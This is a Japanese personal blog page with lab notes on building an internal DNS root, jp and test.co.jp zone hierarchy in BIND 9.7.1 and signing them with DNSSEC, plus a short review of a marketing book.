lost and found ( for me ? )

how to deploy DNSSEC on Auth Servers

DNSSEC テスト用ゾーンを準備 ( 下記 )

下記の環境を使用する。

http://lost-and-found-narihiro.blogspot.com/2010/06/dns-how-to-deploy-internal-root-zone-jp.html

# named -v
BIND 9.7.1

internal root : hat1-vm 192.168.1.50
internal jp : hat2-vm 192.168.1.51
internal test.co.jp : hat3-vm 192.168.1.52
cashing name server : hat4-vm 192.168.1.80

まずは、Island of chain trust を作成する前に各ゾーンを DNSSEC に対応させる。

[ internal root : hat1-vm ]

[root@hat1-vm named]# cat root_zone_internal.db
$TTL 86400
@ IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.

x.root-servers.net. IN A 192.168.1.50

jp. IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51


- generate KSK

[root@hat1-vm named]# pwd
/var/named  <- ゾーンファイルがあるディレクトリ


[root@hat1-vm named]# dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom .
Generating key pair..++++++ ...........................................................................++++++
K.+008+24796


      -3
           Use an NSEC3-capable algorithm to generate a DNSSEC key. If this
           option is used and no algorithm is explicitly set on the command
           line, NSEC3RSASHA1 will be used by default. Note that RSASHA256 and
           RSASHA512 algorithms are NSEC3-capable.

-a algorithm

- generate ZSK

[root@hat1-vm named]# dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom .Generating key pair................................+++ ................................+++
K.+008+18525

- modify zone file

ゾーンファイルに KSK , ZSK と登録

[root@hat1-vm named]# cat K.+008+*.key > root.key

[root@hat1-vm named]# cat root_zone_internal.db
$TTL 86400
@ IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.

x.root-servers.net. IN A 192.168.1.50

jp. IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51

$INCLUDE "root.key";

- ゾーンに書名

[root@hat1-vm named]# dnssec-signzone -o . root_zone_internal.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
                      ZSKs: 1 active, 0 stand-by, 0 revoked
root_zone_internal.db.signed

- modify named.conf

options {
        directory "/var/named";
        pid-file "/var/run/named/named.pid";
        max-cache-size 20M;
        recursion no;
        version "";
        dnssec-enable yes;  <- これ
        dnssec-validation yes;  <- これ
};

zone  "." in {
        type master;
#       file "root_zone_internal.db";
        file "root_zone_internal.db.signed"; <-これ
        };

- BIND起動

[root@hat1-vm named]# named

シスログ

Jun 30 00:43:23 hat1-vm named[2243]: zone ./IN: loaded serial 2010062304 (DNSSEC signed)

チェック。大丈夫そう。

[root@hat1-vm named]# dig @127.1 . soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 . soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40509
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN SOA

;; ANSWER SECTION:
. 86400 IN SOA x.root-servers.net. hostmaster.root-servers.net. 2010062304 3600 900 2592000 3600
. 86400 IN RRSIG SOA 8 0 86400 20100729144058 20100629144058 18525 . v7wamV28v9gv36qAFy+FO6O90/aAU7gVmouFIqZobmZEZkpBSRpKqRoE sJS8DwtylTswMUStdNoQQksh7Am0T+s/C/NzAdw5Q7P4EgEZl0994KJD ecuDWacw8sh4ZA2WTS45X3vpiQdLrhRHuVp0oow5zazUCvs7d3d0PkIn LRGTDSXPvTwrWAVAwfqZc7sOitXxV0w4ZQpoQLNbMDO4c1QFNGbtoWOf lBjX2PBuAcA3vSDQ5045INszrOCBkPcgO5n9yAUddagSDxS41+4827K8 qAy4SaAwuCEkeXCMeRUXl6suh9KFmLtsH4sEnjrHkN8W/trmaRZNKG9O 1NEFhg==


[root@hat1-vm named]# dig @127.1 jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2949
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 3, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;jp. IN SOA

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 3600 IN NSEC x.root-servers.net. NS RRSIG NSEC
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729144058 20100629144058 18525 . d1+KRH3zHRUbHjWa89PteodxieWybwJ1JHu8FVTVuQrS2q47qyZPyhzu BmA8XR9HW2B3a7ZML8IxMNB2pjPgnDguwoO+Kr0W0A72RueLkGFbw0Xd A2j2qcMdEvit7O2DMMe1Kx8ILclxZ+xtZrv4AyPU4Pt72u6Kqko3rvTX wQMsxzv5D7A7bLLJ5V6CgOT7fmRZFHwpKbEX2akScSEK77XXbOp+Paop dVlmmGwVpTeidtHQQy9AB7N27/AXiWBWmy63+1kUsclQOlIbs4i5NtO1 VeDjSW3TDW81ZO6kRkXWi6kQq0kDfeScH9ztswx74JNn5dQpmeMf+IKQ YKP4XQ==

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 3 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 00:45:53 2010
;; MSG SIZE  rcvd: 394

[root@hat1-vm named]#
[root@hat1-vm named]# dig @127.1 co.jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1151
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 3, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;co.jp. IN SOA

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 3600 IN NSEC x.root-servers.net. NS RRSIG NSEC
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729144058 20100629144058 18525 . d1+KRH3zHRUbHjWa89PteodxieWybwJ1JHu8FVTVuQrS2q47qyZPyhzu BmA8XR9HW2B3a7ZML8IxMNB2pjPgnDguwoO+Kr0W0A72RueLkGFbw0Xd A2j2qcMdEvit7O2DMMe1Kx8ILclxZ+xtZrv4AyPU4Pt72u6Kqko3rvTX wQMsxzv5D7A7bLLJ5V6CgOT7fmRZFHwpKbEX2akScSEK77XXbOp+Paop dVlmmGwVpTeidtHQQy9AB7N27/AXiWBWmy63+1kUsclQOlIbs4i5NtO1 VeDjSW3TDW81ZO6kRkXWi6kQq0kDfeScH9ztswx74JNn5dQpmeMf+IKQ YKP4XQ==

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 2 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 00:45:59 2010
;; MSG SIZE  rcvd: 397

[root@hat1-vm named]#


キャッシュサーバから確認。

trusted-keys に internal root の KSK ( K.+008+24796 ) を登録

      1 options {
      2         directory "/var/named";
      3         pid-file "/var/run/named/named.pid";
      4         max-cache-size 5M;
      5         recursion yes;
      6         version "";
      7         dnssec-enable yes;
      8         dnssec-validation yes;

     21 zone  "." in {
     22         type hint;
     23         file "named.ca";
     24         };

     51 trusted-keys {
     52
     53 "." 257 3 8 "AwEAAbMQ3cEdLfYbAitpiWvfJkWKncHe2PyNwd77jHCwy0eSm7EBtqqo rZ     53 ic53HgeolqwoAxut/m+BmGCTHU8pcbrphiGIxrSz1o4KjzCcchKmvz vClM78IrB9XZA8Z1t     53 wTMf/n2i1aMxSbIrmaP9Ik4eu7xr2RwNu2y6LaJ fFGSF/7Z";
     54
     55 };

hints は内部ルートを指定している。

[root@hat4-vm hattori]# cat /var/named/named.ca
.                        3600000  IN  NS    X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET.      3600000      A     192.168.1.50

いざ、dig 。ad ビットが立ってるので大丈夫そう。

[root@hat4-vm ~]# dig @127.1 . soa +dnssec +multiline

; <<>> DiG 9.7.1 <<>> @127.1 . soa +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 15386
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN SOA

;; ANSWER SECTION:
. 86400 IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304 ; serial
3600       ; refresh (1 hour)
900        ; retry (15 minutes)
2592000    ; expire (4 weeks 2 days)
3600       ; minimum (1 hour)
)
. 86400 IN RRSIG SOA 8 0 86400 20100729144058 (
20100629144058 18525 .
v7wamV28v9gv36qAFy+FO6O90/aAU7gVmouFIqZobmZE
ZkpBSRpKqRoEsJS8DwtylTswMUStdNoQQksh7Am0T+s/


[root@hat4-vm ~]# dig @127.1 . ns +dnssec +multiline

; <<>> DiG 9.7.1 <<>> @127.1 . ns +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45504
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 86250 IN NS x.root-servers.net.
. 86250 IN RRSIG NS 8 0 86400 20100729144058 (
20100629144058 18525 .
tME2znW74GdLmDOuspJCcrWrAEu45nfEV9iP+k5HidCG
R19q12e3CMjvsWrKJB4M4238rhNipJc9YA+rWMw7bwwD
BgzwTJDI1HAt30eMiEJnAnBqDYoievjDDpSl32TkyuUQ


[ internal jp zone : hat2-vm ]

zone  "jp" in {
        type master;
        file "jp_zone_internal.db";
        };


[root@hat2-vm named]# cat jp_zone_internal.db
$TTL 86400
@ IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

test.co.jp. IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52

- generate KSK

[root@hat2-vm named]# pwd
/var/named

# dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom jp

- generate ZKK

 # dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom jp

- modify jp zone file

[root@hat2-vm named]# cat Kjp.+008+*.key > jp.key

[root@hat2-vm named]# cat jp_zone_internal.db
$TTL 86400
@ IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

test.co.jp. IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52

$INCLUDE "jp.key";

- sign jp zone

[root@hat2-vm named]# dnssec-signzone -o jp jp_zone_internal.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
                      ZSKs: 1 active, 0 stand-by, 0 revoked
jp_zone_internal.db.signed

[root@hat2-vm named]# named

Jun 30 01:25:19 hat2-vm named[2326]: zone jp/IN: loaded serial 2010062303 (DNSSEC signed)

[root@hat2-vm named]# dig @127.1 jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17885
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;jp. IN SOA

;; ANSWER SECTION:
jp. 86400 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
jp. 86400 IN RRSIG SOA 8 1 86400 20100729152408 20100629152408 20163 jp. WNS9s/JLh+QZcj73AkntNcu3fR7UfXgOZGq3aU7S55AjPOA5kCX71hMa OnRv2oFnojozxtTC6nOEWVXBifJ7pmbAApMg4W8RCwQAi2lVO43M+liF U1iJ4FuWT7BNVG63O4oUlQxhBWkgmV2h3eIL3m2b1LsGhWb09d9CH7hj Se6AmpmSRR69A8lAmUG/3godGnkqyPUPIZ6izLo9Q9PjCo4FLpiM7taT I+imqPkj54UEAEgNqP0pgNAnWjToZtpLhD2tsxuwW9yqyHaAv8/fgo9o 8xNNqz3m5bdxlc4KPdhBxDPl1hw6Xbxx0YOw+4Wp+A4RrbAaRpefYjzi RxHD1w==

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 86400 IN RRSIG NS 8 1 86400 20100729152408 20100629152408 20163 jp. o0KawU5TH51OJq9/uyApCjydNUMuEmLzFOL4yDzDaw+TfHzBfkebRgdQ OFosbykoRBOVYZIy+7x0/B8vYRPvHm5K9tRFFIoxbEmV7RdTsY1NJqvI CB2fjhMJFzO1MS9H87Ws4y/q6aXu4h0+jitILTPV7U2W66YxRqQCHp25 xg6vCz/JI6snXlqAehswnNIRx3yHsIxxdBxReJRxhzJvjdIpLfPRPPcv ILw84+C5xzQCmKTw8CyK4ceS0kVWmriVSjgyKH2fTMJZ6LSNgguvc88q Bf5sGuoEPpJ/9BXV2o7Hj9BdpPXhinvbHc/Wttu6+UUIFfC36Ql9FpqV SOfXPA==

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51
x.dns.jp. 86400 IN RRSIG A 8 3 86400 20100729152408 20100629152408 20163 jp. ZRtCXGXRiog8qvAn8OWjt+Ougu5GX7cHeE7TFHGTjGzGc3hVe4uCTFd8 OFKwFdb1Jp0DGZPXw2drjPGKFT/Al/uGHV53f3aacFxXIbd/AL0OGEat nMwYZS6D2a6VMezxZy3TTSc6XO9ZD+7niTtmMdvLAVtjHoO9Q9T6k7AW DVyDMazMF0woaYy8eRxjlCI5eMdp1Wdg+kfoKgAF/Nuv01yx7Ii8p3L7 wwv/odrC9F/lKSvNc17YoGzSsCAtd0TR0gpLNbZwdXXBFLq90hgoICpL kIcQdn2nB9Xu3jzO+N9Dy7TzvGunpMC1jt4nTCe0W5Wcl02laPWdejU4 uFik4g==

;; Query time: 3 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 01:25:57 2010
;; MSG SIZE  rcvd: 984

[root@hat2-vm named]#
[root@hat2-vm named]# dig @127.1 co.jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32409
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;co.jp. IN SOA

;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
jp. 3600 IN RRSIG SOA 8 1 86400 20100729152408 20100629152408 20163 jp. WNS9s/JLh+QZcj73AkntNcu3fR7UfXgOZGq3aU7S55AjPOA5kCX71hMa OnRv2oFnojozxtTC6nOEWVXBifJ7pmbAApMg4W8RCwQAi2lVO43M+liF U1iJ4FuWT7BNVG63O4oUlQxhBWkgmV2h3eIL3m2b1LsGhWb09d9CH7hj Se6AmpmSRR69A8lAmUG/3godGnkqyPUPIZ6izLo9Q9PjCo4FLpiM7taT I+imqPkj54UEAEgNqP0pgNAnWjToZtpLhD2tsxuwW9yqyHaAv8/fgo9o 8xNNqz3m5bdxlc4KPdhBxDPl1hw6Xbxx0YOw+4Wp+A4RrbAaRpefYjzi RxHD1w==
jp. 3600 IN NSEC test.co.jp. NS SOA RRSIG NSEC DNSKEY
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729152408 20100629152408 20163 jp. JIQHWC+6W7+geaCUTKC1+DCSZqMKwikcoPZcXCYhOixqNpB9sT6p3R8A fdKf19mMXDyUIUbqN6zDNA1OP7x5gwJ4eFr8Kv+QA5Cafp3NaKkrcoGf iZA0lN+A1nIOVxvtbP9tj8pyOI0Vb+nMuQhbvac9IOVE8hxHzihh+04D tQRSJ/lHlgNyQK1THbwaQDfstw4DzxWyeCOrBHj7Q/4ofpL5XwvjnwfI cMfrj4CBHIHID/64pq6CulfvJwjaCFBU4Jalx99FwxeZ0DD+UY7zVGS5 F/nus3QkDqhO382YFiJp6UHsb/T5uOREq9v0kWe/UDEYg7NZLD0P7KHU 8q4+bw==

Island of chain trust になってないので、キャッシュサーバからの設定はまだ。

[ test.co.jp : hat3-vm ]


[root@hat3-vm named]# cat test.co.jp.db
$TTL 86400
@     IN      SOA     ns.test.co.jp. hostmaster.test.co.jp. (
        2010062303
        1h
        15m
        30d
        1h )
        IN      NS      ns.test.co.jp.

ns.test.co.jp.       IN      A       192.168.1.52
www.test.co.jp. IN A 10.0.0.1

  133  dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom test.co.jp
  134  dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom test.co.jp


[root@hat3-vm named]# cat Ktest.co.jp.+008+*.key > test.co.jp.key

[root@hat3-vm named]# cat test.co.jp.db
$TTL 86400
@     IN      SOA     ns.test.co.jp. hostmaster.test.co.jp. (
        2010062303
        1h
        15m
        30d
        1h )
        IN      NS      ns.test.co.jp.

ns.test.co.jp.       IN      A       192.168.1.52
www.test.co.jp. IN A 10.0.0.1

$INCLUDE "test.co.jp.key";


[root@hat3-vm named]# dnssec-signzone -o test.co.jp test.co.jp.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
                      ZSKs: 1 active, 0 stand-by, 0 revoked
test.co.jp.db.signed

zone "test.co.jp" {
type master;
# file "test.co.jp.db";
file "test.co.jp.db.signed";
};

Jun 30 01:37:35 hat3-vm named[2764]: zone test.co.jp/IN: loaded serial 2010062303 (DNSSEC signed)


[root@hat3-vm named]# dig @127.1 test.co.jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 test.co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48852
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;test.co.jp. IN SOA

;; ANSWER SECTION:
test.co.jp. 86400 IN SOA ns.test.co.jp. hostmaster.test.co.jp. 2010062303 3600 900 2592000 3600
test.co.jp. 86400 IN RRSIG SOA 8 3 86400 20100729153623 20100629153623 8448 test.co.jp. TMtWJBFkKfWnBYyu/I1YddPXisB0HHN3YMJGtFvyPzqRzCpByoXGm5dp Hp30+XosNWdAQaNharVcdILUHJPdBAePzhT8HLiNQfTFVTyrLNikRVvp gmDtey8ueI5Kx+78oTwHHWAzcjUgT+9r9R0w4hP8ggjd0VR4KZb1k0rR wpkAuTKcFroJfQTS/7Kk6tYhvJ5DOfkutcQYK5ymhmiQoRKQl0zgDb// 5Lg8DwimbVofIhwDgSJYxKE2qSxN+pu1RFzPWB5snAJ5IOQMDwnAeU3h k0svEta6uzfI8cRPAgKATx47JmGcMCbQ25J2HhrlW52Dc4SaYIKVuO+/ wwCnlA==

;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.
test.co.jp. 86400 IN RRSIG NS 8 3 86400 20100729153623 20100629153623 8448 test.co.jp. wAVapgwcoYN/BRZODCUC/JeFp/Nfg2r4cVP5vZGQZzalQRmSomVO6Iwv VLlZkajq2XLbS1v5LHIeu/wAWBaA0ms2MQ4eXSUZNmVIMXj3pyYgVTA2 WSENhzKZ2MsNoOJn3D2ypXxrRLB8SF2zLKHI9N4yRNtT6MDUD8PNT46c f2mEQMfotZdmd5tS2A/J13+nB2gCFN8MBxPWvJLnKoDYZUfc3y3the4b 3KpyJMswO4kvy4VqR9rHVYntIr4D5QFcIqxt+GtBjgAgx/W3C8TE+2ca akdiwhnwNuBKCSnAfH+njuc9+J0ReHa+CJO+XIhVCHRF8QBNImxR7odc uRD7VA==

;; ADDITIONAL SECTION:
ns.test.co.jp. 86400 IN A 192.168.1.52
ns.test.co.jp. 86400 IN RRSIG A 8 4 86400 20100729153623 20100629153623 8448 test.co.jp. bZgXs0iHMhS8VCbKSYMtYSvbM1qWd2bym4HeMsM2BihmYaFkm9M1BmTy pQEv9Jpb3MuZmW7iA6GWyX2u0xepbRI3CKmZMlzGX6MhuK8a1GgprH+R 2nlx0sLlkP6VT0dmOh1F1ANu6M4RE1zo2lHR++X9vacpqZzpJPhAegNr Aq09u35RnUcUSLo7miQGuO11/CESK76w1GXLXEDjxzkaqEIxIwVCwA9t E4mx7WG3U9zOqMlRgo9vJ5o06EcANhVDASGNCrw9I6AUPr9AYFn/lH/s wIE0eDZPqDkklxATNBCaGqOKL5j5eXEY4sjFSzHn82A0j/2JQkK2EZ/s EqeCrw==

とりあえずここまで。

Cheers!

書評: マーケティング実践講座

マーケティング実践講座
著者  須藤和和
ダイヤモンド社




タイトルのとおり、マーケティング戦略の本

この本のよいと感じたことは、マーケティング行う上での手順を説明し、その後、
実例を利用し商品開発から販売までの戦略について解説しており、とても理解しやすい構成となっているところ。

セグメンテーション、ターゲット顧客の選定、商品開発、価格決定、プロモーション、流通経路 の決定方法
についての考え方が説明されている。
分析手法として、SWOT分析、3C , 4P、回帰分析などの説明があり、とても有用である。

顧客のニーズ調査のためのアンケートの作成に関して、どのようなアンケートがよい or not の説明はとても興味深かった。
ついつい、やってしまいがちな例などがあり、そうだそうだ、
とうなずく部分が多数あった。

実例として、サントリー DAKARA の製品開発から販売にいたるまで、どのようなマーケティング戦略が立てられたか、丁寧に解説されており、理解を深めるのに役立った。

具体的には競合製品 ( ポカリ、アクエリアス ) が存在する中でどのような戦略を取ったと考えられるか、詳細に解説されており、学ぶべきところが多数あった。

競合製品がある中で、どのようにして販売戦略を立てるか、いつも悩む問題なので、
この本で解説されていることは、色々と応用できると感じられた一冊である。






DNS: how to deploy internal root zone , jp zone , test.co.jp zone for internal testing

この設定であってるのかな??。。
ミスってるかも。

internal root : 192.168.1.50 ( hostname : hat1-vm )
internal jp ( co.jp ) : 192.168.1.51 ( hostname : hat2-vm )
test.co.jp : 192.168.1.52 ( hostname : hat3-vm )
キャッシュサーバ : 192.168.1.80 ( hostname : hat4-vm )

All DNS servers are running under KVM ( Kernel-based Virtual Machine).

 # named -v
BIND 9.7.1

[ internal root server ( hat1-vm ) ]

zone  "." in {
        type master;
        file "root_zone_internal.db";
        };

[root@hat1-vm ~]# cat /var/named/root_zone_internal.db 
$TTL 86400
. IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.

x.root-servers.net. IN A 192.168.1.50

jp. IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

co.jp. IN NS x.dns.jp.


[ internal jp (co.jp ) zone ( hat2-vm ) ]

zone  "." in {
        type hint;
        file "named.ca";
        };

zone  "jp" in {
        type master;
        file "jp_zone_internal.db";
        };

ルートサーバは internal root server の IP , 192.168.1.50を指定

[root@hat2-vm ~]# cat /var/named/named.ca
.                        3600000  IN  NS    X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET.      3600000      A     192.168.1.50
[root@hat2-vm ~]# 

- jp ゾーン

[root@hat2-vm ~]# cat /var/named/jp_zone_internal.db 
$TTL 86400
jp. IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

test.co.jp. NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52
[root@hat2-vm ~]# 

[ test.co.jp ゾーン ( hat3-vm ) ]

zone  "." in {
        type hint;
        file "named.ca";
        };

zone "test.co.jp" {
        type master;
        file "test.co.jp.db";
};

[root@hat3-vm ~]# cat /var/named/named.ca
.                        3600000  IN  NS    X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET.      3600000      A     192.168.1.50
[root@hat3-vm ~]# 
[root@hat3-vm ~]# cat /var/named/test.co.jp.db 
$TTL 86400
test.co.jp.     IN      SOA     ns.test.co.jp. hostmaster.test.co.jp. (
        2010062303
        1h
        15m
        30d
        1h )
        IN      NS      ns.test.co.jp.

ns.test.co.jp.       IN      A       192.168.1.52

www.test.co.jp. IN A 10.0.0.1

[ キャッシュサーバ ( hat4-vm ) ]

options {
        directory "/var/named";
        pid-file "/var/run/named/named.pid";
        max-cache-size 5M;
        recursion yes;
        version "";
};

zone  "." in {
        type hint;
        file "named.ca";
        };

[root@hat4-vm ~]# cat /var/named/named.ca
.                        3600000  IN  NS    X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET.      3600000      A     192.168.1.50


[ キャッシュサーバから www.test.co.jp の名前解決ができるか確認 ]

名前解決できたー

[root@hat4-vm ~]# dig @127.1 www.test.co.jp.

; <<>> DiG 9.7.1 <<>> @127.1 www.test.co.jp.
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42021
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;www.test.co.jp. IN A

;; ANSWER SECTION:
www.test.co.jp. 86400 IN A 10.0.0.1

;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.

ルートからたどってみると、

[root@hat4-vm ~]# dig @192.168.1.50 www.test.co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 www.test.co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29607
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.test.co.jp. IN A

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51


[root@hat4-vm ~]# dig @192.168.1.51 www.test.co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 www.test.co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48652
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.test.co.jp. IN A

;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.

;; ADDITIONAL SECTION:
ns.test.co.jp. 86400 IN A 192.168.1.52

[root@hat4-vm ~]# dig @192.168.1.52 www.test.co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.52 www.test.co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65425
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.test.co.jp. IN A

;; ANSWER SECTION:
www.test.co.jp. 86400 IN A 10.0.0.1

;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.

;; ADDITIONAL SECTION:
ns.test.co.jp. 86400 IN A 192.168.1.52

他クエリいろいろ ( dig @a.root-servers.net , dig @a.dns.jp の回答と比べてあっているっぽいので,設定は大丈夫かなと )

[root@hat4-vm ~]# dig @192.168.1.50 . +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 . +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59980
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;. IN A

;; AUTHORITY SECTION:
. 3600 IN SOA x.root-servers.net. hostmaster.root-servers.net. 2010062304 3600 900 2592000 3600

;; Query time: 1 msec
;; SERVER: 192.168.1.50#53(192.168.1.50)
;; WHEN: Tue Jun 29 00:26:29 2010
;; MSG SIZE  rcvd: 81

[root@hat4-vm ~]# 
[root@hat4-vm ~]# dig @192.168.1.50 jp. +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 jp. +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38991
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;jp. IN A

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 2 msec
;; SERVER: 192.168.1.50#53(192.168.1.50)
;; WHEN: Tue Jun 29 00:26:33 2010
;; MSG SIZE  rcvd: 56

[root@hat4-vm ~]# 
[root@hat4-vm ~]# dig @192.168.1.50 co.jp +norec

